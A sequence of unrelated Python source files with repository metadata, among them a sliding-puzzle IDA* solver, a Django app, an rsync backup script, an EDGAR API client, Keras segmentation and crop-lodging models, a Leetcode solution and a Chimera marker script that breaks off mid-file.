bound = self.h(root)
while True:
t = self._search(0, bound)
if t is self.FOUND:
return self.path, self.path_descrs, bound, self.nodes_evaluated
if t is None:
return None
bound = t
def _search(self, g, bound):
self.nodes_evaluated += 1
node = self.path[-1]
f = g + self.h(node)
if f > bound:
return f
if self.is_goal(node):
return self.FOUND
m = None
for cost, n, descr in self.neighbours(node):
if n in self.is_in_path:
continue
self.path.append(n)
self.is_in_path.add(n)
self.path_descrs.append(descr)
t = self._search(g + cost, bound)
if t == self.FOUND:
return self.FOUND
if m is None or (t is not None and t < m):
m = t
self.path.pop()
self.path_descrs.pop()
self.is_in_path.remove(n)
return m
def slide_solved_state(n):
return tuple(i % (n * n) for i in range(1, n * n + 1))
def slide_neighbours(n):
movelist = []
for gap in range(n * n):
x, y = gap % n, gap // n
moves = []
if x > 0:
moves.append(-1)
if x < n - 1:
moves.append(+1)
if y > 0:
moves.append(-n)
if y < n - 1:
moves.append(+n)
movelist.append(moves)
def neighbours(p):
gap = p.index(0)
l = list(p)
for m in movelist[gap]:
l[gap] = l[gap + m]
l[gap + m] = 0
yield (1, tuple(l), (l[gap], m))
l[gap + m] = l[gap]
l[gap] = 0
return neighbours
def encode_cfg(cfg, n):
r = 0
b = n.bit_length()
for i in range(len(cfg)):
r |= cfg[i] << (b * i)
return r
def gen_wd_table(n):
goal = [[0] * i + [n] + [0] * (n - 1 - i) for i in range(n)]
goal[-1][-1] = n - 1
goal = tuple(sum(goal, []))
table = {}
to_visit = [(goal, 0, n - 1)]
while to_visit:
cfg, cost, e = to_visit.pop(0)
enccfg = encode_cfg(cfg, n)
if enccfg in table:
continue
table[enccfg] = cost
for d in [-1, 1]:
if 0 <= e + d < n:
for c in range(n):
if cfg[n * (e + d) + c] > 0:
ncfg = list(cfg)
ncfg[n * (e + d) + c] -= 1
ncfg[n * e + c] += 1
to_visit.append((tuple(ncfg), cost + 1, e + d))
return table
def slide_wd(n, goal):
wd = gen_wd_table(n)
goals = {i: goal.index(i) for i in goal}
b = n.bit_length()
def h(p):
ht = 0
vt = 0
d = 0
for i, c in enumerate(p):
if c == 0:
continue
g = goals[c]
xi, yi = i % n, i // n
xg, yg = g % n, g // n
ht += 1 << (b * (n * yi + yg))
vt += 1 << (b * (n * xi + xg))
if yg == yi:
for k in range(i + 1, i - i % n + n):
if p[k] and goals[p[k]] // n == yi and goals[p[k]] < g:
d += 2
if xg == xi:
for k in range(i + n, n * n, n):
if p[k] and goals[p[k]] % n == xi and goals[p[k]] < g:
d += 2
d += wd[ht] + wd[vt]
return d
return h
|
[
"lw_git@mail.ru"
] |
lw_git@mail.ru
|
a8491753e9b9fe0cc8c2af6b7127150d578917db
|
97c326715d884169e60567553c40ba528cce0333
|
/todo_app/migrations/0001_initial.py
|
c0c0ca6a9c4bc03e05d17cef5667b419d5c54883
|
[] |
no_license
|
anurajr067/task
|
cad93b604af469c810007b15177e041d0fbe429b
|
82f7142caa6da6acd2db34fec26f51349a1f7c2a
|
refs/heads/master
| 2023-08-30T10:46:51.126256
| 2021-11-03T10:51:36
| 2021-11-03T10:51:36
| 424,180,891
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 537
|
py
|
# Generated by Django 3.2.9 on 2021-11-02 14:12
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Task',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('priority', models.IntegerField()),
],
),
]
|
[
"anurajr06@gmail.com"
] |
anurajr06@gmail.com
|
963c944290dde8a0570ef60185e02857a933d42d
|
1dd77c3652abf3321fdb449f452d368feef3e756
|
/src/runners/HW3/fix.py
|
d7146ff04540918187d07a32f7c5d9304aecb2bc
|
[] |
no_license
|
ronnygeo/SearchEngine
|
6e44a7b738974f5ba76f804d54d391173f21bfc1
|
1ea72694b87e2d722f22427d57e15a3cd965f9ec
|
refs/heads/master
| 2021-06-17T20:21:06.221263
| 2017-06-30T14:32:22
| 2017-06-30T14:32:22
| 94,489,570
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 635
|
py
|
import os
import re
for root, _, files in os.walk("../../../output/data5/", topdown=False):
for name in files:
if name.startswith("data"):
print(os.path.join(root, name))
try:
with open("../../../output/datafix/"+name, "wb") as out:
with open(os.path.join(root, name), encoding="utf-8") as fp:
for line in fp:
newline = re.sub("</HTML>", "</HTMLSOURCE>", line)
out.write(newline.encode("UTF-8"))
except UnicodeDecodeError:
print("Unicode Error: ", name)
|
[
"rmathew@ruelala.com"
] |
rmathew@ruelala.com
|
f8b408e979f4e27f681ffa668357f87e9502d668
|
d8bacd9471607634f9a0b9302a02fcc944edd8ac
|
/Fix a slow system with python/daily_sync.py
|
d91c6cd20e1108b2016c7a7bee2aa0fbda643f10
|
[] |
no_license
|
sechibueze/automate-real-world-tasks-using-python
|
54bfe8a3642f8791aa6168a51376eb10febf4495
|
cf8bf829e246759f91f0a1834b8a94dfeef25639
|
refs/heads/master
| 2023-06-15T09:04:31.355437
| 2021-07-14T12:54:02
| 2021-07-14T12:54:02
| 385,939,116
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,089
|
py
|
#!/usr/bin/env python
import subprocess
import os
from multiprocessing inport Pool
src = "/data/prod/"
dest = "/data/prod_backup/"
WORKING_DIR = os.getcwd()
src = os.path.abspath(src)
dest = os.path.abspath(dest)
# Basic test
#source = os.path.join(WORKING_DIR, "prod")
#destination = os.path.join(WORKING_DIR, "dest")
print("working dir", WORKING_DIR)
print("src dir", src)
print("dest", dest)
def get_path_list(src_directory):
src_directory = os.path.abspath(src_directory)
print("src backup dir : ", src_directory)
path_list = []
for directory, folderslist, fileslist in os.walk(src_directory):
directory = os.path.abspath(directory)
subfolder = directory[len(src_directory):]
print("processing root dir ", directory)
for f in fileslist:
# Get the sub folder
file_item = f
# Add subfolder and file to list
# so we can get them via src/subfolder/file_iten
# print("subfolder : root/", subfolder)
print("file root/subfolder/", (subfolder, file_item))
path_list.append((subfolder, file_item))
if folderslist != []:
for d in folderslist:
# subfolder = directory[len(src_directory):]
# print("subfolder : root/", subfolder)
print("file root/subfolder/", (subfolder, d))
path_list.append((subfolder, d))
return path_list
def backup(path):
print("backing up", path)
_from = os.path.join(os.path.abspath(src), path[0], path[1])
to = os.path.join(os.path.abspath(dest), path[0])
flags = "-arq"
print("processing...", _from, " => ", to)
subprocess.call(["rsync", flags, _from, to])
if __name__ == "__main__":
backup_source = get_path_list(src)
print("backup src size", len(backup_source))
# with multiprocessing.Pool(len(backup_source), maxtasksperchild=1) as pool:
pool = Pool(len(backup_source))
pool.map(backup, backup_source)
print("backup list", get_path_list(source))
# subprocess.call(["rsync", "-arq", src, dest])
|
[
"sechibueze@gmail.com"
] |
sechibueze@gmail.com
|
a72ae97de599ae16e4856505c4683b9bdc800603
|
fc35472e85c74fdbbe3fb77bd71d09d128ed14f3
|
/SecData/CompanyData/EdgarAPI.py
|
ec2ddbef7a89fa631ea8e6bbedc48d2e427d0bef
|
[] |
no_license
|
RicardoJavierFernandez/Accessing-SEC-EDGAR-Data
|
5342c988f0e8c103e33b03fcde5cbd11bd395def
|
7c7be5975894f8acf90481906c8f38c15467880e
|
refs/heads/master
| 2022-02-15T09:18:33.415678
| 2019-09-04T01:20:07
| 2019-09-04T01:20:07
| 198,127,883
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,196
|
py
|
import requests
import json
import os
from dotenv import load_dotenv
class FinancialData:
def __init__(self, period):
self.period = period
@staticmethod
def get_api_key():
env_path = os.path.join(os.path.dirname(__file__), '.env')
load_dotenv(env_path)
edgar_api = os.environ.get('edgar_key')
return edgar_api
def request_data(self, company_ticker):
url = 'https://datafied.api.edgar-online.com/v2/corefinancials/{period}.json?primarysymbols={ticker}&appkey={key}'.format(period=self.period, ticker=company_ticker, key=self.get_api_key())
response = requests.get(url)
data = json.loads(response.text)
for item in data['result']['rows']: # [0]['values']
for value in item['values']:
print(value)
annual = FinancialData('ann')
# annual.request_data('MSFT')
quarterly = FinancialData('qtr')
# quarterly.request_data('MSFT')
# Test to see if we can make multiple requests
def multiple_companies_data(object):
company_tickers = ['AAPL', 'MSFT', 'BA']
for company in company_tickers:
object.request_data(company)
# multiple_companies_data(quarterly)
|
[
"ricky@Ricardos-MacBook-Pro.local"
] |
ricky@Ricardos-MacBook-Pro.local
|
72757ad24b3786688fe2ed56dc3dbe1b4730e05e
|
40737b33c8b2d12ec9878e5e0f34d354481f14e3
|
/segmentation/segnet_small.py
|
3c241306339734a21e75584a283e3c6cf88a0da9
|
[] |
no_license
|
vectorai/davinci_vision_tf
|
440cf4514689ae92ece4d1cf9b240618134cf58b
|
1811e68242e8fe6d29ff2c0a9dc6337bd693e382
|
refs/heads/master
| 2021-01-21T14:47:58.503932
| 2017-01-19T17:00:16
| 2017-01-19T17:00:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,376
|
py
|
from __future__ import absolute_import
from __future__ import print_function
import os
#os.environ['KERAS_BACKEND'] = 'theano'
#os.environ['THEANO_FLAGS']='mode=FAST_RUN,device=gpu1,floatX=float32,optimizer=fast_compile,lib.cnmem=0.85'
import pylab as pl
import matplotlib.cm as cm
import matplotlib.pyplot as plt
import itertools
import numpy as np
import theano.tensor as T
np.random.seed(1337) # for reproducibility
from keras.layers.noise import GaussianNoise
import keras.models as models
from keras.layers.core import Layer, Dense, Dropout, Activation, Flatten, Reshape, Merge, Permute
from keras.layers.convolutional import Convolution2D, MaxPooling2D, UpSampling2D, ZeroPadding2D
from keras.layers.normalization import BatchNormalization
from keras.utils import np_utils
from keras.regularizers import ActivityRegularizer
#from keras.utils.visualize_util import plot
from keras import backend as K
import h5py as h5
import cv2
import numpy as np
path = './household_data/rgbd-dataset/'
data_shape = 360/4*480/4
num_classes=53
class UnPooling2D(Layer):
"""A 2D Repeat layer"""
def __init__(self, poolsize=(2, 2)):
super(UnPooling2D, self).__init__()
self.poolsize = poolsize
@property
def output_shape(self):
input_shape = self.input_shape
return (input_shape[0], input_shape[1],
self.poolsize[0] * input_shape[2],
self.poolsize[1] * input_shape[3])
def get_output(self, train):
X = self.get_input(train)
s1 = self.poolsize[0]
s2 = self.poolsize[1]
output = X.repeat(s1, axis=2).repeat(s2, axis=3)
return output
def get_config(self):
return {"name":self.__class__.__name__,
"poolsize":self.poolsize}
def create_encoding_layers():
kernel = 3
filter_size = 64
pad = 1
pool_size = 2
return [
ZeroPadding2D(padding=(pad,pad)),
Convolution2D(filter_size, kernel, kernel, border_mode='valid'),
BatchNormalization(),
Activation('relu'),
MaxPooling2D(pool_size=(pool_size, pool_size)),
ZeroPadding2D(padding=(pad,pad)),
Convolution2D(128, kernel, kernel, border_mode='valid'),
BatchNormalization(),
Activation('relu'),
# MaxPooling2D(pool_size=(pool_size, pool_size)),
# ZeroPadding2D(padding=(pad,pad)),
# Convolution2D(256, kernel, kernel, border_mode='valid'),
# BatchNormalization(),
# Activation('relu'),
# MaxPooling2D(pool_size=(pool_size, pool_size)),
# ZeroPadding2D(padding=(pad,pad)),
# Convolution2D(512, kernel, kernel, border_mode='valid'),
# BatchNormalization(),
# Activation('relu'),
# MaxPooling2D(pool_size=(pool_size, pool_size)),
]
def create_decoding_layers():
kernel = 3
filter_size = 64
pad = 1
pool_size = 2
return[
#UpSampling2D(size=(pool_size,pool_size)),
ZeroPadding2D(padding=(pad,pad)),
Convolution2D(128, kernel, kernel, border_mode='valid'),
BatchNormalization(),
UpSampling2D(size=(pool_size,pool_size)),
ZeroPadding2D(padding=(pad,pad)),
Convolution2D(filter_size, kernel, kernel, border_mode='valid'),
BatchNormalization(),
]
def model(input_shape):
autoencoder = models.Sequential()
# Add a noise layer to get a denoising autoencoder. This helps avoid overfitting
autoencoder.add(Layer(input_shape=input_shape))
#autoencoder.add(GaussianNoise(sigma=0.3))
autoencoder.encoding_layers = create_encoding_layers()
autoencoder.decoding_layers = create_decoding_layers()
for i,l in enumerate(autoencoder.encoding_layers):
autoencoder.add(l)
print(i,l.input_shape,l.output_shape)
for i,l in enumerate(autoencoder.decoding_layers):
autoencoder.add(l)
print(i,l.input_shape,l.output_shape)
the_conv=(Convolution2D(num_classes, 1, 1, border_mode='valid',))
autoencoder.add(the_conv)
print (the_conv.input_shape,the_conv.output_shape)
autoencoder.add(Reshape((num_classes,data_shape)))#, input_shape=(num_classes,360,480)))
autoencoder.add(Permute((2, 1)))
autoencoder.add(Activation('softmax'))
#from keras.optimizers import SGD
#optimizer = SGD(lr=0.01, momentum=0.8, decay=0., nesterov=False)
return autoencoder
|
[
"raulpuric@berkeley.edu"
] |
raulpuric@berkeley.edu
|
145893f711e24039e4bd72458aa31c510fee8669
|
8919a06d37109957797c6e741b6ccaa8c58cd524
|
/sg_auth/apps.py
|
6f3255f5cda9fb008bdcad0ebda671ae0fd3653d
|
[] |
no_license
|
itslong/study_guide
|
fa7405077f19ebadca9a6a118ae1b972486b2bcd
|
84c4d3c34aca12bf0730dd878935329aa4cb67f8
|
refs/heads/master
| 2023-01-13T22:53:57.713958
| 2020-03-26T20:07:46
| 2020-03-26T20:07:46
| 228,972,988
| 0
| 0
| null | 2023-01-05T07:21:09
| 2019-12-19T04:12:03
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 88
|
py
|
from django.apps import AppConfig
class SgAuthConfig(AppConfig):
name = 'sg_auth'
|
[
"lliang@Earth-C-137.local"
] |
lliang@Earth-C-137.local
|
9198fc3018431e7b81593895817db2fc54427b4e
|
172d207feab16e09963adb2199ed851d5c691500
|
/manage.py
|
0f3555abcd7f990a3dc38e1a614b3121cc857230
|
[
"MIT"
] |
permissive
|
kas2337/kas-library
|
dd37dc75f5fe0ea524b88969845a8ecc58117a68
|
67bf612597ae4c03433fa683b85bff7093d6ffbe
|
refs/heads/main
| 2023-08-10T21:15:16.841694
| 2021-09-28T07:26:09
| 2021-09-28T07:26:09
| 409,850,555
| 0
| 0
|
MIT
| 2021-09-24T06:52:10
| 2021-09-24T06:04:18
| null |
UTF-8
|
Python
| false
| false
| 667
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'kas_library.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"artem.kuznetsov@osinit.com"
] |
artem.kuznetsov@osinit.com
|
84a60bb0fca1b111b3184419caca0e1aad3ff1bb
|
344bdd04d310394c3fb2a693ebc8ad442dbd87cf
|
/240_search_a_2DMatrix_II.py
|
c58efe18b8c5d623a4a0cb47dc211d3746de85a6
|
[] |
no_license
|
AprilSun007/Leetcode
|
6372316829288c152722b2f7207cbc88273fe948
|
f5d6a4d0754c4ac85e62458b183e69e78373342b
|
refs/heads/master
| 2020-09-28T09:27:34.445862
| 2020-09-18T03:09:43
| 2020-09-18T03:09:43
| 226,747,465
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,902
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Dec 7 23:07:37 2019
240. Search a 2D Matrix II
Write an efficient algorithm that searches for a value in an m x n matrix. This matrix has the following properties:
Integers in each row are sorted in ascending from left to right.
Integers in each column are sorted in ascending from top to bottom.
Example:
Consider the following matrix:
[
[1, 4, 7, 11, 15],
[2, 5, 8, 12, 19],
[3, 6, 9, 16, 22],
[10, 13, 14, 17, 24],
[18, 21, 23, 26, 30]
]
Given target = 5, return true.
@author: jinwensun
"""
import math
class Solution_final:
def searchMatrix(self, matrix, target):
"""
:type matrix: List[List[int]]
:type target: int
:rtype: bool
"""
if len(matrix) == 0:
return False
if len(matrix) == 1:
return target in matrix[0]
if matrix[0][0] > target or matrix[-1][-1] < target:
return False
n_row = len(matrix)
n_col = len(matrix[0])
x1 = n_row -1
x2 = 0
while x1 >= 0 and x2 < n_col:
if matrix[x1][x2] == target:
return True
elif matrix[x1][x2] > target:
x1 = x1 -1
else:
x2 = x2 + 1
return False
class Solution(object):
def searchMatrix(self, matrix, target):
"""
:type matrix: List[List[int]]
:type target: int
:rtype: bool
"""
if len(matrix) == 0:
return False
if len(matrix) == 1:
return target in matrix[0]
if matrix[0][0] > target or matrix[-1][-1] < target:
return False
n_rows = len(matrix)
mid = int(math.floor((n_rows-1)/2))
index_upper = False
index_lower = False
if matrix[mid][-1] > target:
index_upper = self.searchMatrix(matrix[0:(mid + 1)], target)
elif matrix[mid][-1] == target:
return True
if matrix[mid+1][0] < target:
index_lower = self.searchMatrix(matrix[(mid+1):], target)
elif matrix[mid+1][0] == target:
return True
return (index_upper or index_lower)
# ------------------------ Leedcode ---------------------------- #
class Solution_BinarySearch:
def binary_search(self, matrix, target, start, vertical):
lo = start
hi = len(matrix[0])-1 if vertical else len(matrix)-1
while hi >= lo:
mid = (lo + hi)//2
if vertical: # searching a column
if matrix[start][mid] < target:
lo = mid + 1
elif matrix[start][mid] > target:
hi = mid - 1
else:
return True
else: # searching a row
if matrix[mid][start] < target:
lo = mid + 1
elif matrix[mid][start] > target:
hi = mid - 1
else:
return True
return False
def searchMatrix(self, matrix, target):
# an empty matrix obviously does not contain `target`
if not matrix:
return False
# iterate over matrix diagonals starting in bottom left.
for i in range(min(len(matrix), len(matrix[0]))):
vertical_found = self.binary_search(matrix, target, i, True)
horizontal_found = self.binary_search(matrix, target, i, False)
if vertical_found or horizontal_found:
return True
return False
class Solution_DivideConquer:
def searchMatrix(self, matrix, target):
# an empty matrix obviously does not contain `target`
if not matrix:
return False
def search_rec(left, up, right, down):
# this submatrix has no height or no width.
if left > right or up > down:
return False
# `target` is already larger than the largest element or smaller
# than the smallest element in this submatrix.
elif target < matrix[up][left] or target > matrix[down][right]:
return False
mid = left + (right-left)//2
# Locate `row` such that matrix[row-1][mid] < target < matrix[row][mid]
row = up
while row <= down and matrix[row][mid] <= target:
if matrix[row][mid] == target:
return True
row += 1
return search_rec(left, row, mid-1, down) or search_rec(mid+1, up, right, row-1)
return search_rec(0, 0, len(matrix[0])-1, len(matrix)-1)
class Solution_SpaceReduction:
def searchMatrix(self, matrix, target):
# an empty matrix obviously does not contain `target` (make this check
# because we want to cache `width` for efficiency's sake)
if len(matrix) == 0 or len(matrix[0]) == 0:
return False
# cache these, as they won't change.
height = len(matrix)
width = len(matrix[0])
# start our "pointer" in the bottom-left
row = height-1
col = 0
while col < width and row >= 0:
if matrix[row][col] > target:
row -= 1
elif matrix[row][col] < target:
col += 1
else: # found it
return True
return False
if __name__ == '__main__':
nums = [[5],[6]]
target = 6
s = Solution_final()
#print(s.twoSum_ptr(nums, 0, False))
print(s.searchMatrix(nums, target))
|
[
"jinwnesun007@gmail.com"
] |
jinwnesun007@gmail.com
|
3cedea4a1d40e03471f96a58f25daf209586b9f7
|
0e9ff12bf44570d4b00beeac043f4608174641a4
|
/run_LodgeNet.py
|
6984aef46bb2b946b49fd015bf5298075719ea6f
|
[
"MIT"
] |
permissive
|
FarhadMaleki/LodgedNet
|
a675e3ce651b0445243b9bfef0e8a0c621f9010f
|
9334806dcb158d6027d9fb4b3f588c5d36ba468e
|
refs/heads/master
| 2022-07-18T10:26:48.832004
| 2019-10-18T03:12:15
| 2019-10-18T03:12:15
| 180,228,006
| 18
| 6
|
MIT
| 2022-06-21T21:53:40
| 2019-04-08T20:30:54
|
Python
|
UTF-8
|
Python
| false
| false
| 1,572
|
py
|
import time
import numpy as np
from models import DeepLodge, redefine_classifier
from runner import run
import os.path
import torch
from utils import calculate_test_acc
import logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
SEED = 1
np.random.seed(SEED)
torch.manual_seed(SEED)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
# crop must be either 'wheat' or 'canola'
crop = 'wheat'
# num_channels must be either 3 or 5
num_channels = 3
if num_channels == 3:
data_format = 'RGB'
else:
data_format = 'BGRRededgeNIR'
# Set dataset information
data_dir = "."
train_dir = os.path.join(data_dir, "data/{}/{}/train".format(crop, data_format))
test_dir = os.path.join(data_dir, "data/{}/{}/test".format(crop, data_format))
batch_size = 16
num_epochs = 50
# Model creation
model_ft = DeepLodge(feature_size=42, num_channels=num_channels)
###############################################################################
num_params = sum(p.numel() for p in model_ft.parameters())
logger.info('Number of parameters: {}'.format(num_params))
###############################################################################
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
model_ft, loader = run(model_ft, train_dir, test_dir, crop, num_channels,
batch_size, num_epochs)
dataloaders = loader.dataloaders
testloader = dataloaders["test"]
test_acc = calculate_test_acc(model_ft, testloader, device)
logger.info('\nTest Acc: {:4f}'.format(test_acc.item()))
|
[
"farhad.maleki@usask.ca"
] |
farhad.maleki@usask.ca
|
b3b20fdc6ff7c91e7b8a202afc9e8292bc8e8779
|
711756b796d68035dc6a39060515200d1d37a274
|
/output_cog/optimized_44838.py
|
81bfad0bb617706addec6575ebd8cdc2b70a351a
|
[] |
no_license
|
batxes/exocyst_scripts
|
8b109c279c93dd68c1d55ed64ad3cca93e3c95ca
|
a6c487d5053b9b67db22c59865e4ef2417e53030
|
refs/heads/master
| 2020-06-16T20:16:24.840725
| 2016-11-30T16:23:16
| 2016-11-30T16:23:16
| 75,075,164
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,836
|
py
|
import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
if "Cog2_GFPN" not in marker_sets:
s=new_marker_set('Cog2_GFPN')
marker_sets["Cog2_GFPN"]=s
s= marker_sets["Cog2_GFPN"]
mark=s.place_marker((613.939, 549.207, 490.2), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_0" not in marker_sets:
s=new_marker_set('Cog2_0')
marker_sets["Cog2_0"]=s
s= marker_sets["Cog2_0"]
mark=s.place_marker((557.861, 545.181, 530.5), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_1" not in marker_sets:
s=new_marker_set('Cog2_1')
marker_sets["Cog2_1"]=s
s= marker_sets["Cog2_1"]
mark=s.place_marker((487.181, 538.691, 570.993), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_GFPC" not in marker_sets:
s=new_marker_set('Cog2_GFPC')
marker_sets["Cog2_GFPC"]=s
s= marker_sets["Cog2_GFPC"]
mark=s.place_marker((488.926, 561.447, 434.039), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_Anch" not in marker_sets:
s=new_marker_set('Cog2_Anch')
marker_sets["Cog2_Anch"]=s
s= marker_sets["Cog2_Anch"]
mark=s.place_marker((347.183, 509.951, 702.034), (0.89, 0.1, 0.1), 18.4716)
if "Cog3_GFPN" not in marker_sets:
s=new_marker_set('Cog3_GFPN')
marker_sets["Cog3_GFPN"]=s
s= marker_sets["Cog3_GFPN"]
mark=s.place_marker((577.763, 552.573, 519.036), (1, 1, 0), 18.4716)
if "Cog3_0" not in marker_sets:
s=new_marker_set('Cog3_0')
marker_sets["Cog3_0"]=s
s= marker_sets["Cog3_0"]
mark=s.place_marker((580.023, 553.49, 517.972), (1, 1, 0.2), 17.1475)
if "Cog3_1" not in marker_sets:
s=new_marker_set('Cog3_1')
marker_sets["Cog3_1"]=s
s= marker_sets["Cog3_1"]
mark=s.place_marker((588.494, 571.881, 497.469), (1, 1, 0.2), 17.1475)
if "Cog3_2" not in marker_sets:
s=new_marker_set('Cog3_2')
marker_sets["Cog3_2"]=s
s= marker_sets["Cog3_2"]
mark=s.place_marker((572.502, 591.995, 485.359), (1, 1, 0.2), 17.1475)
if "Cog3_3" not in marker_sets:
s=new_marker_set('Cog3_3')
marker_sets["Cog3_3"]=s
s= marker_sets["Cog3_3"]
mark=s.place_marker((560.469, 616.538, 492.083), (1, 1, 0.2), 17.1475)
if "Cog3_4" not in marker_sets:
s=new_marker_set('Cog3_4')
marker_sets["Cog3_4"]=s
s= marker_sets["Cog3_4"]
mark=s.place_marker((573.95, 634.349, 508.296), (1, 1, 0.2), 17.1475)
if "Cog3_5" not in marker_sets:
s=new_marker_set('Cog3_5')
marker_sets["Cog3_5"]=s
s= marker_sets["Cog3_5"]
mark=s.place_marker((590.831, 646.888, 525.365), (1, 1, 0.2), 17.1475)
if "Cog3_GFPC" not in marker_sets:
s=new_marker_set('Cog3_GFPC')
marker_sets["Cog3_GFPC"]=s
s= marker_sets["Cog3_GFPC"]
mark=s.place_marker((602.233, 539.559, 512.34), (1, 1, 0.4), 18.4716)
if "Cog3_Anch" not in marker_sets:
s=new_marker_set('Cog3_Anch')
marker_sets["Cog3_Anch"]=s
s= marker_sets["Cog3_Anch"]
mark=s.place_marker((576.902, 749.27, 541.163), (1, 1, 0.4), 18.4716)
if "Cog4_GFPN" not in marker_sets:
s=new_marker_set('Cog4_GFPN')
marker_sets["Cog4_GFPN"]=s
s= marker_sets["Cog4_GFPN"]
mark=s.place_marker((447.415, 662.788, 670.034), (0, 0, 0.8), 18.4716)
if "Cog4_0" not in marker_sets:
s=new_marker_set('Cog4_0')
marker_sets["Cog4_0"]=s
s= marker_sets["Cog4_0"]
mark=s.place_marker((447.415, 662.788, 670.034), (0, 0, 0.8), 17.1475)
if "Cog4_1" not in marker_sets:
s=new_marker_set('Cog4_1')
marker_sets["Cog4_1"]=s
s= marker_sets["Cog4_1"]
mark=s.place_marker((437.933, 650.205, 646.329), (0, 0, 0.8), 17.1475)
if "Cog4_2" not in marker_sets:
s=new_marker_set('Cog4_2')
marker_sets["Cog4_2"]=s
s= marker_sets["Cog4_2"]
mark=s.place_marker((452.764, 629.194, 633.662), (0, 0, 0.8), 17.1475)
if "Cog4_3" not in marker_sets:
s=new_marker_set('Cog4_3')
marker_sets["Cog4_3"]=s
s= marker_sets["Cog4_3"]
mark=s.place_marker((471.335, 609.708, 622.491), (0, 0, 0.8), 17.1475)
if "Cog4_4" not in marker_sets:
s=new_marker_set('Cog4_4')
marker_sets["Cog4_4"]=s
s= marker_sets["Cog4_4"]
mark=s.place_marker((492.954, 594.647, 608.938), (0, 0, 0.8), 17.1475)
if "Cog4_5" not in marker_sets:
s=new_marker_set('Cog4_5')
marker_sets["Cog4_5"]=s
s= marker_sets["Cog4_5"]
mark=s.place_marker((514.969, 581.364, 593.482), (0, 0, 0.8), 17.1475)
if "Cog4_6" not in marker_sets:
s=new_marker_set('Cog4_6')
marker_sets["Cog4_6"]=s
s= marker_sets["Cog4_6"]
mark=s.place_marker((537.215, 567.241, 578.712), (0, 0, 0.8), 17.1475)
if "Cog4_GFPC" not in marker_sets:
s=new_marker_set('Cog4_GFPC')
marker_sets["Cog4_GFPC"]=s
s= marker_sets["Cog4_GFPC"]
mark=s.place_marker((440.647, 803.794, 602.929), (0, 0, 0.8), 18.4716)
if "Cog4_Anch" not in marker_sets:
s=new_marker_set('Cog4_Anch')
marker_sets["Cog4_Anch"]=s
s= marker_sets["Cog4_Anch"]
mark=s.place_marker((655.636, 337.061, 539.021), (0, 0, 0.8), 18.4716)
if "Cog5_GFPN" not in marker_sets:
s=new_marker_set('Cog5_GFPN')
marker_sets["Cog5_GFPN"]=s
s= marker_sets["Cog5_GFPN"]
mark=s.place_marker((526.957, 540.456, 597.521), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_0" not in marker_sets:
s=new_marker_set('Cog5_0')
marker_sets["Cog5_0"]=s
s= marker_sets["Cog5_0"]
mark=s.place_marker((526.957, 540.456, 597.521), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_1" not in marker_sets:
s=new_marker_set('Cog5_1')
marker_sets["Cog5_1"]=s
s= marker_sets["Cog5_1"]
mark=s.place_marker((513.284, 520.402, 582.033), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_2" not in marker_sets:
s=new_marker_set('Cog5_2')
marker_sets["Cog5_2"]=s
s= marker_sets["Cog5_2"]
mark=s.place_marker((502.088, 513.414, 556.191), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_3" not in marker_sets:
s=new_marker_set('Cog5_3')
marker_sets["Cog5_3"]=s
s= marker_sets["Cog5_3"]
mark=s.place_marker((483.053, 528.089, 539.193), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_GFPC" not in marker_sets:
s=new_marker_set('Cog5_GFPC')
marker_sets["Cog5_GFPC"]=s
s= marker_sets["Cog5_GFPC"]
mark=s.place_marker((572.279, 533.153, 452.556), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_Anch" not in marker_sets:
s=new_marker_set('Cog5_Anch')
marker_sets["Cog5_Anch"]=s
s= marker_sets["Cog5_Anch"]
mark=s.place_marker((386.301, 528.781, 619.136), (0.3, 0.3, 0.3), 18.4716)
if "Cog6_GFPN" not in marker_sets:
s=new_marker_set('Cog6_GFPN')
marker_sets["Cog6_GFPN"]=s
s= marker_sets["Cog6_GFPN"]
mark=s.place_marker((554.534, 537.457, 502.882), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_0" not in marker_sets:
s=new_marker_set('Cog6_0')
marker_sets["Cog6_0"]=s
s= marker_sets["Cog6_0"]
mark=s.place_marker((554.528, 537.448, 502.86), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_1" not in marker_sets:
s=new_marker_set('Cog6_1')
marker_sets["Cog6_1"]=s
s= marker_sets["Cog6_1"]
